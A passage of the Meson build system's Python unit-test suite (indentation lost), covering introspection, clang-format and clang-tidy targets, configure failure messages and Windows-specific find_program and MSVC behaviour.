'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '72 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
prog = 'trivialprog'
if is_windows():
prog = '{}.exe'.format(prog)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# If compile worked then we should get a program
self.assertPathExists(os.path.join(self.builddir, prog))
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, prog))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '74 dep files')
# Regression test: Spurious reconfigure was happening when build
# directory is inside source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During first configure the file did not exist so no dependency should
# have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but is inside build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
